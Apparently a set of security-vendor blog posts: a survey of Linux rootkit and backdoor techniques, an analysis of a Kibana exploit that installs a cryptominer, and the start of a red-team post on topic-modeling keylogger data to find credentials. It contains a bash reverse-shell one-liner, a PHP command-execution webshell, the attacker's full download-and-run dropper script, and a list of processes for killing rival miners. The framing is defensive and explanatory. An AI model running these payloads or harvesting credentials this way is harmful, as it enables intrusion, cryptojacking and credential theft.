Similar to kernel modules that hide themselves, once an eBPF program is attached to a kprobe, it can prevent processes from interacting with the kernel, listing eBPF programs, or listing kernel modules. However, contrary to kernel modules, eBPF filters need to be tied to a running process to stay alive. That said, if that process is init, the rootkit can stay alive as long as the system is running.

Software / Userspace

Contrary to kernel-level rootkits, userspace backdoors usually don’t have absolute powers, but they are easier to write and carry less risk -- a mistake or a version incompatibility won’t crash the operating system.

Rootkits Replacing Common Utilities

The oldest category of userspace rootkits is those which replace common utilities. Usually, a binary that is running with root privileges is replaced or modified in the running system. Such rootkits can easily be detected by file integrity checking tools and signature-based solutions. Popular tools to scan a system for infections of this sort are chkrootkit and Rootkit Hunter, which check for known signatures/modifications performed by rootkits. For instance, chkrootkit performs a series of tests in the local system for hidden files or modifications performed by their tracked list of rootkits, and lists open connections involving port numbers known to be used by malware. 
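The core of such file-integrity checking is hashing binaries and comparing against a trusted baseline. A minimal sketch of the idea (using a non-cryptographic FNV-1a hash for brevity; real integrity checkers use cryptographic hashes and signed databases, and tools like chkrootkit add signature tests on top):

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* FNV-1a over a byte buffer; real tools use SHA-256 or similar, but
 * the compare-against-baseline logic is identical. */
static uint64_t fnv1a(const unsigned char *buf, size_t len)
{
    uint64_t h = 1469598103934665603ULL;

    for (size_t i = 0; i < len; i++) {
        h ^= buf[i];
        h *= 1099511628211ULL;
    }
    return h;
}

/* Flag a binary whose current hash no longer matches the baseline
 * recorded when the system was known to be clean. */
static int is_tampered(uint64_t baseline, const unsigned char *buf, size_t len)
{
    return fnv1a(buf, len) != baseline;
}
```

The weakness noted above follows directly from this design: the check only catches modifications to the bytes it hashes, which is why rootkits moved into kernel memory and ELF metadata.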

Rootkits Abusing ELF Metadata

A thorough demonstration of a metadata-based backdoor is presented by Shapiro et al.: Using Cobbler, the authors demonstrated that it is possible to compile arbitrary payloads into an ELF’s executable metadata, which are then “executed” by the run-time loader (RTLD). To provide a PoC of a backdoor using this technique, they inject a metadata-based backdoor into the ping binary of Ubuntu’s inetutils v1.8. Normally ping runs setuid as root and drops its root privileges early on, also accepting an optional --type argument to customize the type of packets sent. If that argument is provided, ping tests the arguments like so:

if (strcasecmp(arg, "echo") == 0) {...}

The rootkit overrides the call to setuid() with getuid() (so as to not produce noticeable side effects), and overrides the call to strcasecmp() with execl(). This results in ping not dropping privileges and treating the argument to --type as a path to an executable to be executed. If the flag is not passed, the binary performs its regular functionality.

The key parts behind this implementation are as follows:

  • The compiler building ping does not know where setuid() and strcasecmp() will live at runtime and thus creates entries in the executable’s Global Offset Table (GOT) to be lazily filled by the dynamic linker. However, if an entry in the GOT table is not empty, the address provided will be considered as the location of the respective function in memory.
  • The rootkit crafts metadata to look up the base address of libc, then calculate the offsets of getuid() and execl(), and finally patch the GOT of ping to point to them before the binary is executed. The important part here is that this can be achieved with merely nine relocation entries and one symbol entry, without making any changes to the executable segments of the binary.
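Since the GOT is ultimately a table of function pointers consulted at call time, the patch can be sketched with a one-slot stand-in table. The functions below are illustrative substitutes for libc’s setuid()/getuid(), not the actual PoC:

```c
#include <assert.h>

/* Illustrative stand-ins for functions normally reached through the GOT. */
static int stub_setuid(void) { return 0; }  /* would drop privileges */
static int stub_getuid(void) { return 1; }  /* side-effect free */

/* A one-entry "GOT": calls to setuid go through this slot, just as
 * dynamically-linked calls go through real GOT entries. */
static int (*got_setuid_slot)(void) = stub_setuid;

/* ping's privilege-dropping step, as seen through the GOT. */
static int drop_privileges(void)
{
    return got_setuid_slot();
}
```

Repointing got_setuid_slot before drop_privileges() runs mirrors what the crafted relocation entries do to the real GOT: the caller’s code is untouched, only the indirection target changes.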

Module Backdoors

When was the last time you checked the integrity of your Apache or PHP modules? Module-supporting software is a good target for backdoors, as they can go undetected by almost all antivirus or network-based IDS systems (since, if written properly, traffic generated by a backdoor on the web server appears as, well, web server traffic). Another appealing aspect of modules is that, in most cases, they are platform-independent and can easily be ported to different OSes and versions (e.g., as is the case with PHP). In this section, we present three examples of backdoors using modules, one for PHP and two for the Apache server:

  • PHP-Backdoor registers a PHP extension that hooks operations like hash and sha1 and subsequently logs the inputs to these functions (which are primarily passwords). This is a toy-example, but it is indicative of how different points in the system can be compromised by attackers to exfiltrate information.
  • mod_authg is an Apache module that simply registers a hook handler that fetches contents through Apache’s portable runtime, essentially allowing leakage of system info. For instance, once the module is loaded, one may invoke it by passing /authg?c=id to the target URL and get a reply like the following:
HTTP/1.1 200 OK
Date: Thu, 19 Feb 2015 16:33:30 GMT
Server: Apache/2.4.7 (Ubuntu)
Content-Length: 54
Connection: close
Content-Type: text/html

uid=33(www-data) gid=33(www-data) groups=33(www-data)
  • mod_rootme is an Apache backdoor that can spawn a root shell. If configured properly, Apache is not running as root, but the module enables root access by abusing a pre-fork hook while the Apache process still has root permissions.

Although the above backdoors are stripped-down from their full capability potential, they are indicative of the fact that there are many different points where a system can be compromised. One may argue that such backdoors are often easily detectable through configuration files. However, more advanced hiding techniques can be deployed by attackers, such as hiding malicious payloads within existing modules, or by modifying the appropriate objects. 

For instance, Bußmeyer et al. demonstrate how to attack class-one smart card reader implementations, using a Javascript-based rootkit PoC which works as follows: first they hook appropriate Javascript functions in Firefox’s js3250.dll, then modify the Javascript loaded on window.onload so that every page viewed in an SSL secure banking context includes malicious remote Javascript which performs manipulated transactions that are hidden from the user.

Runtime Backdoors

Instead of modifying a PHP or Nodejs module, why not use the execution environment to your benefit? Runtime backdoors reflect a technique which has been used in the wild when hosts or websites are malicious. For instance, in Rootkits for Javascript Environments, Adida et al. demonstrate how it is possible to alter the Javascript environment in a webpage to steal user passwords when login bookmarklets are involved. Bookmarklets (also known as favelets or Javascript bookmarks) allow users to click on an element in their bookmark bar, and run Javascript in the context of the current web page. 

The bookmarklet feature has been used by common password managers and ads to auto-complete user info in various website forms. However, bookmarklets know nothing about the web page until their code actually executes, and their execution is opportunistic. In the benign scenario, the bookmarklet interacts with the native Javascript environment directly (Figure 1 - left). However, given a malicious webpage, the bookmarklet can be manipulated by interacting with the attacker’s Javascript objects instead (Figure 1 - right).

Figure 1 [src]

This allows, for instance, attackers to steal user passwords if they trick the bookmarklet into using the wrong password for a page.

Script & Config Backdoors

Reverse shells and other types of backdoors can also be implemented as simple scripts that are running in the system. Several such examples exist in open-source repositories and forums, ranging from simple one-liners such as bash -i >& /dev/tcp/<ip>/<port> 0>&1 to full-fledged scripts or binaries. Likewise, a backdoor could be part of untrusted code that is running on the host. For instance, a PHP website with the following code present in its codebase is vulnerable to remote command execution, in which the HTTP header of the request can be used to send commands to the server:

   if (isset($_SERVER['HTTP_CMD'])) {
       echo "<pre>" . shell_exec($_SERVER['HTTP_CMD']) . "</pre>";
   }

Similarly, one can spawn loggers of various sorts (e.g., nc -vlp 80, using netcat to log incoming traffic to port 80). Attackers may also achieve persistence by modifying appropriate configuration files or scheduled tasks, such as by updating .bashrc entries to invoke other binaries instead of system utilities, replacing common commands using aliases, or modifying cronjob tasks, which are used to schedule user tasks on a periodic basis. For example, known malware has “disguised” shell scripts as PNG files that attempt to replace different users’ cron schedules with contents from freshly-downloaded files, which subsequently start more weird creatures like cryptocurrency miners.

The above examples are just samples of the different possibilities open to attackers, and similar patterns can be applied to all public-facing code: regardless of the programming language used, backdoors can be inserted at every point, from the code itself, to the compiler toolchain, to the continuous integration and shipping stages. As stated in the classic Turing Award lecture “Reflections on Trusting Trust”: “To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust the people who wrote the software.” (or for that matter, trust that you are in good hands for your runtime protection ;))

Ptrace and inotify Hooks

Being in userland doesn’t mean that you can’t be stealthy. Several backdoors use ptrace to attach to a process and change its arguments by setting a breakpoint on main(). Similarly, one can use ptrace on attach and clone calls, executing a malicious payload in a new thread inside a host binary. Such techniques, as well as using inotify handlers to place read watches on directories that are critical to the detection of the backdoor, have been known to be popular in the wild. 
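The attach pattern underlying these techniques can be sketched in a few lines (a hedged illustration, not taken from any particular backdoor): a tracer forks a child that volunteers to be traced and stops itself, so the tracer regains control at exactly the point where a backdoor would rewrite arguments or inject a payload.

```c
#include <assert.h>
#include <signal.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Returns the child's exit status, or -1 on error. */
static int trace_child(void)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        ptrace(PTRACE_TRACEME, 0, NULL, NULL);
        raise(SIGSTOP);  /* hand control to the tracer */
        _exit(7);        /* the "original" program logic */
    }

    int status;
    waitpid(pid, &status, 0);  /* child is stopped at the SIGSTOP */
    if (!WIFSTOPPED(status))
        return -1;
    /* ...a malicious tracer would GETREGS/POKEDATA here... */
    ptrace(PTRACE_DETACH, pid, NULL, NULL);  /* let it run untouched */
    waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

A real backdoor attaches to an already-running victim (PTRACE_ATTACH) rather than forking it, but the stop-inspect-modify-continue loop is the same.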

Inotify is a Linux mechanism for monitoring filesystem events. One can register filesystem change callbacks that trigger if certain directories or files are accessed. Once backdoors detect that someone is about to mess with their files, they can unlink them from their original location, wait for the file/directory traversal to end, then restore things as if nothing ever happened -- kind of like a magic trick.
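A minimal sketch of the watch primitive itself (the directory and file names below are arbitrary choices for the demonstration; a backdoor would watch its install directory and unlink its files on the event instead of just reporting it):

```c
#include <assert.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/inotify.h>
#include <sys/types.h>
#include <unistd.h>

/* Watch `dir` for file creation and report whether an IN_CREATE event
 * for `name` arrives. */
static int saw_create(const char *dir, const char *name)
{
    int hit = 0;
    int fd = inotify_init();
    if (fd < 0)
        return 0;
    if (inotify_add_watch(fd, dir, IN_CREATE) < 0) {
        close(fd);
        return 0;
    }

    /* Trigger the event ourselves for the demonstration. */
    char path[512];
    snprintf(path, sizeof(path), "%s/%s", dir, name);
    int tmp = open(path, O_CREAT | O_WRONLY, 0600);
    if (tmp >= 0)
        close(tmp);

    char buf[4096] __attribute__((aligned(__alignof__(struct inotify_event))));
    ssize_t len = read(fd, buf, sizeof(buf));  /* blocks until an event */
    for (ssize_t off = 0; off < len;) {
        struct inotify_event *ev = (struct inotify_event *)(buf + off);
        if ((ev->mask & IN_CREATE) && ev->len && strcmp(ev->name, name) == 0)
            hit = 1;
        off += (ssize_t)(sizeof(*ev) + ev->len);
    }
    unlink(path);
    close(fd);
    return hit;
}
```

Swap IN_CREATE for IN_ACCESS or IN_OPEN and the same loop tells a backdoor the moment an investigator starts reading its files.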

LD_PRELOAD Backdoors

LD_PRELOAD allows overriding functions that would normally be loaded dynamically with user-provided alternatives. Essentially, a preloaded module can hook a dynamically-loaded function (e.g., one from libc) and specify a function to be called in its place. This latter function can perform a series of actions before calling the original function, or skip it altogether. Such hooks are very practical and are mainly used for debugging (e.g., faking clock time to achieve deterministic builds and tests) but can also be used to implement security features. Naturally, the mechanism has been abused by malware to effectively backdoor applications. Rootkits such as Azazel or bdvl demonstrate how such hooks can be used to bypass authentication mechanisms or to open connections to remote services.
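The hooking pattern itself fits in a few lines. In a real attack, code like the following lives in a shared object loaded via LD_PRELOAD; for a self-contained sketch we define the same-named wrapper inside the program, which still resolves the genuine libc function the same way, via dlsym(RTLD_NEXT, ...). The hook_called flag is a stand-in for whatever the backdoor would actually do:

```c
#define _GNU_SOURCE
#include <assert.h>
#include <dlfcn.h>
#include <sys/types.h>
#include <unistd.h>

static int hook_called = 0;

/* Same-named wrapper shadowing libc's getpid(). An LD_PRELOAD rootkit
 * ships functions like this in a preloaded .so, typically hooking
 * auth- or file-related calls rather than getpid. */
pid_t getpid(void)
{
    pid_t (*real_getpid)(void) =
        (pid_t (*)(void))dlsym(RTLD_NEXT, "getpid");

    hook_called = 1;  /* a backdoor would log, steal, or lie here */
    return real_getpid ? real_getpid() : (pid_t)-1;
}
```

Callers see the normal return value while the wrapper runs first, which is exactly how Azazel-style hooks hide connections and bypass checks without the hooked program noticing.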


In this post, we outlined common techniques used by attackers to gain persistence in an execution environment. Although several of these techniques can be thwarted by modern runtime checkers and malware analysis frameworks, a recurring theme emerges: functionality that involves state and dynamic loading or unloading of code can be used both for good and evil, and the pool for new attack vectors is endless. 

Thus, it is critical not only to analyze software for such vulnerabilities, but also to build robust dynamic detection and prevention frameworks that rely not only on known exploitation patterns, but can provide runtime assurances that user-defined security properties are not violated. Our goal at Capsule8 is to provide the protection and visibility needed to ensure Linux production systems aren’t pwned, without slowing down performance or inadvertently creating new backdoor opportunities (we don’t use a kernel module for, well, all the above reasons). 

1 Originally, the term rootkit was coined to denote “a collection of tools that enabled administrator-level access to a computer or network” (think utilities like sed and ps). Today the term refers almost exclusively to malware. In this post, we will use the term rootkit to denote any malicious program that achieves persistence, whether in kernel-space or userspace. Return^

2 You may check the settings in your system by examining CONFIG_RANDOMIZE_BASE and CONFIG_RANDOMIZE_MEMORY in your kernel config. Return^

The Curious Case of a Kibana Compromise

Posted by

The sun rose, coffee was guzzled, and fingers clicked away at keys, making it a typical day at Capsule8 HQ – until it wasn’t. As the Capsule8 team deployed one of our toy target instances (one with exploitable software on it for demo purposes), we noticed alerts firing from components which weren’t part of our normal demo. 

With a penchant for the paranoid (many of us are former black hats, after all), our suspicions flared at this irregularity. Was there exploitable software on this instance beyond that which we pre-installed? Indeed, dear reader, there was.

Here’s what happened

While deploying a cluster of cloud instances full of exploitable software, one of our sales engineers noticed something peculiar, and chimed in on Slack about what might be a potential bug. The deployed instances are part of an environment designed to be a hacking playground where customers and prospects can frolic and observe our detection capabilities (without having to host or attack their own vulnerable infrastructure). This means they are intentionally vulnerable to a variety of command injection, memory corruption, and privilege escalation vulnerabilities. 

We discovered an oddity — an alert arising from a part of the cluster we bolted on to visualize output, not a part of the software “goats” we ritually sacrifice to the demo gods to showcase our wares. No one likes the thought of bugs in their work, so our researchers were quick to jump in and analyze the source of the seemingly spurious alert. We discovered that this was no misfire, but instead an unanticipated (though eagerly welcome) spooky guest deploying their own “surprise administration” capabilities against our Kibana instance. We had real ghouls joining us in our holodeck horror house — Casper the Friendly Ghost this was not.

After analysis, we identified that the bug being popped was an RCE vulnerability in Kibana (CVE-2019-7609), the exploit for which was published on GitHub on October 21st, just two days prior to our detection in the wild within our laissez-faire hackzone. It’s almost 2020, and it brings us a nostalgic tear of joy to know that to this day, the kids still aren’t wasting any time to “productionize” new “tooling”. But as with many attacks against modern infrastructure these days, the attackers were using their newly acquired access for cryptomining.1 They could have stolen our digital soul, but settled for truffling out full-size Snickers bars for their treat pail.

We immediately saw an attacker getting an interactive shell from Kibana, downloading a new executable, and running it (self high-five for that detection win). When going through our alert data, we quickly noticed there were program arguments that were base64 blobs. Looking deeper into attacker behavior, we saw that the base64-encoded data in program arguments was being passed to the base64 command in order to decode it. Attackers often base64-all-the-things to reduce the likelihood of something being escaped incorrectly and failing execution. Attackers like reliability so they can receive more treats than tricks.

The alert excerpt above is from the Capsule8 console, showing the contents and process lineage of the base64 payload being dropped.

Below is the post-base64 decoded script in full, which we will walk through to discuss the operations of this payload:

exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
x() {
x=/kb.$(uname -m)											
z=./$(date|md5sum|cut -f1 -d" ")									
dir=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)						
for i in . $dir /tmp /var/tmp /dev/shm /usr/bin;do touch $i/asdf && cd $i && rm -f asdf && break;done	

wget -t1 -T180 -qU- --no-check-certificate $1$x -O$z || curl -m180 -fsSLkA- $1$x -o$z	
chmod +x $z;$z;rm -f $z										
for h in
if ! ls /proc/$(cat /tmp/.X11-unix/01)/io; then						
x torntpcxcymuceev.$h										

Let’s look through the script line by line:

exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

The first couple of lines shown above redirect all output to /dev/null and set a new PATH environment variable. Most of the script lives within the function x(), which will be called multiple times below.

x() {
x=/kb.$(uname -m)

The first meaningful behavior of this payload is to get the machine architecture. On our nodes, -m returns x86_64.

z=./$(date|md5sum|cut -f1 -d" ")

Here, the attacker is creating a random-looking filename for the Bitcoin mining executable they are about to drop onto the system. While the random file name might stick out like a sore thumb, it makes it harder for other people breaking onto the same box to find and kill this Bitcoin miner (an understandable threat for this attacker to bear in mind, as you will see below).

dir=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)

In this line, the attacker is saving the home directory of the running user.

for i in . $dir /tmp /var/tmp /dev/shm /usr/bin;do touch $i/asdf && cd $i && rm -f asdf && break;done

The above loop is looking for places where the attacker has write access. They’re looping through common directories (including the home directory it just found), changing into each directory, then trying to write a file in it. If it’s successful, they delete the file and exit the loop, with the current working directory being one in which they know they can write.

wget -t1 -T180 -qU- --no-check-certificate $1$x -O$z || curl -m180 -fsSLkA- $1$x -o$z

This wget command downloads the miner. It uses a lot of options, including a single attempt, a 180-second timeout, ignoring insecure TLS certificates, outputting to the filename determined above, quiet mode, and no User Agent. The rest of this line means it also tries the curl command if wget fails, with more-or-less the same options. Whether using wget or curl, the downloaded miner is written to the same filename generated above.

$1 is the URL to pull from.

chmod +x $z;$z;rm -f $z

The above line makes the miner file (the name of which is stored in $z) executable, runs it, and then deletes it as a proactive cleanup step by the attacker.

Below this point, we’re outside the function x(). The rest just loops through onion domains to try to pull the payload, and passes the domain to the function x().

for h in
if ! ls /proc/$(cat /tmp/.X11-unix/01)/io; then

This check looks for a pid value in the file /tmp/.X11-unix/01, presumably written by the attacker to record the pid of the running backdoor. The choice of directory name, .X11-unix, is probably intended to appear benign to users running Linux on the desktop. If the pid referenced in that file exists, the script skips the x() function and instead breaks out of the loop.

x torntpcxcymuceev.$h

The above line actually runs x(), passing in torntpcxcymuceev.<oniondomain>.
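A Python sketch of the same liveness check (the file and /proc paths are the attacker's; the function name is ours):

```python
import os

def backdoor_alive(pid_file):
    """Mimic `ls /proc/$(cat pid_file)/io`: True if the pid recorded in
    pid_file belongs to a live process on a Linux system."""
    try:
        with open(pid_file) as f:
            pid = f.read().strip()
    except OSError:
        return False  # no pid file: the backdoor was never started (or was cleaned up)
    # /proc/<pid>/io exists only while the process is running
    return os.path.exists("/proc/%s/io" % pid)
```

If this returns True, the script assumes its miner is still running and does nothing; otherwise it falls through to x() and reinfects.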


We haven’t reverse engineered the cryptocurrency miner yet, but we were able to quickly ascertain what it was doing by using our investigative capabilities, running SQL queries via AWS Athena against the data we streamed to S3. The two primary things we saw from our query were an attempt to install software on the box (in this case wget, which failed), and an attempt to kill all other cryptominers that might be running on this host:

pkill -9 -f ./cron|8220|aecc2ec|aegis_|AliHids|AliYunDun|aliyun-service|azipl||cronds|currn|curn|crun|cryptonight|ddgs|dhcleint|Donald|fs-manager|finJG|havegeds|hashfish|hwlh3wlh44lh|HT8s|gf128mul|Jonason|java-c|kerberods|khugepageds|kintegrityds|kpsmouseds|kthrotlds|kw0|kworkerds|kworkre|kwroker|mewrs|miner||muhsti|mygit|networkservice|orgfs|pastebin|qW3xT|qwefdas|sleep|stratum|sustes|sustse|sysguard|sysupdate|systeamd|SzdXM|t00ls|thisxxs||/tmp/ddgs|/tmp/java|/tmp/udevs|/tmp/|...

They kept trying to kill other cryptominers on a 10-minute interval, giving off major serial killer vibes. Think of pkill like their digital chainsaw and the attacker as Leatherface trying to kill off all the Jason Voorheeses and Freddy Kruegers in their territory.


Unfortunately for the attacker, they never managed to mine any coin (another win for the Ghostbusters!). Another cluster was popped fairly soon (within a day) after the cluster we investigated was first compromised. Only two of the demo clusters we had open got popped, out of at least a dozen that are unrelated other than all running in AWS. 

We can confidently say that there’s at least one attacker running around trying to find and compromise unpatched Kibana servers. Unfortunately, we didn’t have our investigations capability collecting data in that cluster at first. We turned it on and then restarted our agent to see if the attacker persisted, but the cryptominer didn’t persist and the attacker never came back to that cluster.

The fact that the attacker we saw wasn’t competent enough to do anything useful is honestly a positive. There wasn’t even an attempt to escalate privilege, which is kind of lame on their part — like a ghost who just lurks in shadowed corners to steal leftover change rather than having the guts to scare a human to death and seize the mansion for eternal haunting. In light of this, this was most likely some script kiddies taking advantage of the fact that a public exploit for CVE-2019-7609 was (fairly quietly) dropped.

However, because the bug was so easy to exploit, anyone more sophisticated could have landed this exploit and stayed resident on the system without much worry of being detected. Very few people would have noticed, unless the attacker was doing something ostentatious — like mining for Bitcoin, which eats CPU and drives up cost on any public cloud instance.

But here’s what matters

Of course, a software bug being exploited in the wild is a tale as old as time, like the haunting of a decaying, elegant home on top of a hill. Our case serves as only one of many examples of a known vulnerability becoming a public exploit. Attackers, wanting economies of scale, apply the automation and wormification treatment to maximize the breadth of compromise. This is a tactic even among script kiddies, the most basic of attackers. That is to say, our story is not groundbreaking, or hype-worthy, and we certainly won’t register a domain with custom branding just for it.

When prospects come to us, they’ll often tell us they know they’ve been hacked because their cloud bill went up, and when they investigated, they found cryptomining activity. But they never have any idea how the attacker dropped their cryptominer onto the system, which makes it challenging to assess the damage and make sure it’s contained. Yes, bad things can happen, but you don’t have to panic – you just need to have visibility to know what’s going on so you can handle it efficiently, without leading to organizational disruption.

1. We discovered this by running the script through VirusTotal, showing it clearly was a denizen of Minertown (a figurative city in said boring cyber dystopia). Further investigation showed that the post-exploitation activities line up with similar miners.

The Capsule8 Labs team conducts offensive and defensive research to understand the threat landscape for modern infrastructure and to continuously improve Capsule8’s attack coverage.

Major Key Alert: Data Discovery for Red Teams with an ML Tool for Keylogging

Posted by

With the glut of security vendors who promise to secure to the moon and back on the star-glazed spaceship of Machine Learning (ML) technology, where is the equivalent for red teams? Imagine a scene: an earnest red teamer hunched at their desk, hand under chin, eyes hazy with fatigue as their finger presses the down arrow for what seems like eternity, sifting through irrelevant search history, Word document creation, and Slack messages between colleagues who also enjoy dogs and house-hunting and other trivial things, all to find the treasure they so tenaciously hunt — the user’s credentials.

Keyloggers are an essential tool for red teams, covertly capturing keystrokes by users to discover secrets that help further the goal of pwnage — with the keyboard output created by credential entry being one of the most valuable plums to pluck from the system. Gaining credentials through keylogging can assist with lateral movement or accessing valuable data — so it can be worthwhile for red teams to sit and wait for hours to days for a user to input their password within a veritable ocean of unimportant keystrokes.

For those of you who are ATT&CK Framework fanatics, keylogging corresponds to the “Input Capture” technique, part of the Collection and Credential Access tactics. As you can see under MITRE’s “Examples” section, basically every notable malware / RAT family (like DarkHotel, Duqu, and PoisonIvy) uses a keylogger, as do notorious APTs like APT3 (China), APT28 (Russia), and the Lazarus Group (North Korea).

Capsule8 is built by former black hats to help teams operating Linux production systems ruin other black hats’ fun, so we can empathize with the pain red teams face when having to sift through a mountain of junk data just to find the one credential they need. Leveraging the brilliance of our lead data scientist, Harini Kannan, we’ll demonstrate how to use topic modeling (a natural language processing (NLP) technique) to help downtrodden red teamers more quickly complete their quest of grabbing credentials out of their keystroke or system data dumps.

Topic Modeling 101

First, what is topic modeling? Topic modeling is a text-mining tool using the magic of statistics to uncover abstract concepts that appear in a set of textual data sources (usually documents). The model ingests text data, automatically tries to learn the context (called “topics”), defines the topics, and then splits the dataset into subsets of words based on the identified topics. You can think of a topic as just a repeating pattern of words in a corpus (a collection of texts), and each corpus can be described by a pattern of topics. As a result, topic modeling is a great way to organize, search, and filter text data. 

While there are a number of topic models out there, we used latent Dirichlet allocation (LDA) for this project. LDA is most commonly used for things like clustering similar news articles together or analyzing Shakespeare for themes, but it can be used for any sort of textual data. Although they don’t state it explicitly, Google very likely uses LDA (or a similar model) to enhance search functionality through what they call the “Topic Layer.” The goal of LDA is to map documents to topics and topics to words to help us more quickly understand what is present in the source material.

Efficient keylogging analysis may not be the first use case that comes to mind, but the ability to map disparate log files to topics and topics to words — like passwords — is a decidedly useful endeavor towards that devious ambition.

Setting up the Model

First, we install gensim, a Python library for topic modeling, and nltk, which helps us perform NLP with Python. We also need to install pyLDAvis, a Python library for interactive topic model visualization, and import all other necessary libraries (like pandas and matplotlib). Once all the dependencies are installed, we upload our dataset (if we aren’t running the model locally). 

Cleaning up the dataset

We need to clean up the dataset to transform it from a messy trash pile into a streamlined trash pile — the data pre-processing step. To begin pre-processing our data, we remove stop words, which are extremely common words with little value — think “and”, “in”, or “the” in English. Since system logs don’t really follow English grammar rules (Stannis would be so upset), we added stop words specific to systems, too. For example, stop words for TCP data would include “com”, “request”, and “response”.

Our pre-processing also includes the creation of bigrams and trigrams, as well as data lemmatization. Text that is read two words at a time is a “bigram”; text read three words at a time is a “trigram.” The bigrams of the sentence “I pet a fluffy cat” would be: “I pet”, “pet a”, “a fluffy”, “fluffy cat”. The trigrams of the same sentence would be: “I pet a”, “pet a fluffy”, “a fluffy cat”. Bigrams and trigrams facilitate our model’s understanding of sentences (or strings), and help it figure out the context around words. Using this understanding, the model can begin predicting subsequent words — think of how Google autocompletes queries for you based on what you’ve typed into the search bar thus far.

Lemmatization seeks to find the base of words (called the “lemma”) and removes inflectional endings. For instance, lemmatization removes the “ing” from “walking,” outputting the lemma of “walk.” Importantly, lemmatization can understand context, understanding that “hearing” can be either a verb or a noun, and only outputting the lemma “hear” when it is a verb. Lemmatizing data is an important step in pre-processing so that all forms of a word are treated the same.
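In our pipeline these pre-processing steps use gensim and nltk; the standard-library Python sketch below just illustrates the ideas, with a deliberately naive “ing”-stripping function standing in for a real lemmatizer:

```python
STOP_WORDS = {"and", "in", "the"}  # English stop words; for system logs we
                                   # also add words like "com" and "request"

def remove_stop_words(tokens):
    """Drop extremely common words that carry little value."""
    return [t for t in tokens if t not in STOP_WORDS]

def ngrams(tokens, n):
    """Sliding window of n tokens: n=2 yields bigrams, n=3 trigrams."""
    return [" ".join(tokens[i:i + n]) for i in range(len(tokens) - n + 1)]

def toy_lemma(token):
    """Toy stand-in for a real lemmatizer (our pipeline uses nltk, which is
    context-aware): just strip a trailing 'ing' to get the base form."""
    return token[:-3] if token.endswith("ing") else token
```

Running ngrams("i pet a fluffy cat".split(), 2) reproduces the bigrams from the example above, and toy_lemma("walking") yields "walk" — though, unlike nltk, this toy version has no idea whether “hearing” is a verb or a noun.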

Training the model

To train the model, we first need to compute the coherence score on this pre-processed data. The coherence score measures the relative distance between words within a topic — think of it like a measure of word similarity. Each topic gets its own coherence score. From these multiple scores, we select the model with the highest coherence score, because a higher score implies more distinct topics, and distinct topics expedite data spelunking. This model then gives us the optimal number of topics, ensuring that each topic is sufficiently distinct but relevant.
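The selection step boils down to an argmax over candidate models. Here is a sketch with hypothetical coherence scores; in practice, each score would come from scoring a candidate gensim LdaModel with gensim's CoherenceModel:

```python
def pick_num_topics(coherence_by_k):
    """Select the candidate topic count with the highest coherence score.
    (In our pipeline the scores come from training one LdaModel per
    candidate k and scoring each with a CoherenceModel.)"""
    return max(coherence_by_k, key=coherence_by_k.get)

# Hypothetical coherence scores for candidate models with 2..8 topics:
scores = {2: 0.31, 3: 0.38, 4: 0.41, 5: 0.52, 6: 0.47, 7: 0.44, 8: 0.40}
best_k = pick_num_topics(scores)  # 5
```

With these (made-up) scores, the five-topic model wins, which happens to match the five-topic model we ended up with in the first case study below.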

Topic learning by the model

Once we’ve chosen our optimal model, we can extract the dominant topics. For instance, dominant topics from an article about Linux might include distributions, system calls, or vulnerabilities. Each of these topics would have distinct keywords, such as “Debian,” “Ubuntu,” or “Red Hat” for the distributions topic. These keywords can be visualized through a word cloud, with the size of the keyword reflecting its weightage within the topic. We’ll show you examples of these topic word clouds in our case studies below.

With these defined topics and keywords, we now can plainly see where the appropriate breadcrumb trail begins and begin intelligently searching within a particular topic. It’s like if Gretel and Hansel could apply a topic model to the magical forest and directly explore Topic 0: Candy. 

Now that we understand topic models and how to set them up, let’s walk through the three use cases we created at Capsule8: finding AWS keys in keylogging data, passwords in TCP pcaps, and passwords in HDD logs. If you are impatient, intrigued, overconfident, or all of the above, you can dive right into our model by looking at the Google Colab doc.

Case Study 1: AWS Keys in Keylogger Data

This is where the fun begins! We knew our problem — how to pick out credentials from keylogging data — and our statistical model (LDA), but we didn’t have any keylogging data with which to play. The Capsule8 Labs team offered up their machines to the Elder Research Gods in tribute, so we had multiple users run execsnoop for approximately one day to generate data. In the process, one or more of our colleagues may have “accidentally” spilled their credentials while doing their work on those machines.

We could’ve cheated and used their daily work profile to help us with the analysis, but we wanted to mimic real attackers who are attempting to analyze keylogging data of their victims who aren’t sitting next to them in the open office everyday. Again, the goal is to figure out if any sensitive information leaked, and if so, to figure out those data points from the execsnoop log. Importantly, we must do so without manually combing through the data set — the (super lame) status quo.

Before even touching simple search tools like grep, we want to filter and partition the dataset to gain a sense of where to start within this sea of data. Luckily, the topic model helps us reduce the time to fish out our target data by a lot. Our optimal model had five topics, which is digestible for most humans:

Let’s explore these topics with their respective top keywords (and the weights of those keywords) to see how we can assign categories for each topic.

Topic 0: Folders and source control

Topic 1: Docker-related activity

Topic 2: “Cloud Stuff” (it’s a technical term, promise)

Topic 3: Capsule8 build & GO-related

Topic 4: C-related

Based on the optimal topics identified by the model, we can now determine which topic holds the most potential as a grove of succulent leaked credentials ripe for plucking. Topic 2, aka “Cloud Stuff,” logically seems like it would contain login and configuration commands for various cloud services. Let’s take a look at the list of top 30 words within the topic below to see if any interesting keywords jump out:

(note: the graphic above says “Topic 3” because its numbering begins at 1, rather than 0 as the model uses)

As you can see, the intriguing keyword “aws” is second on this list, which gives us our first breadcrumb. With any luck, these users performed actions like configuring AWS credentials, making the keyword a solid starting point for hunting leaked credentials — particularly if users didn’t follow best practices during the configuration steps, which is regrettably common. 

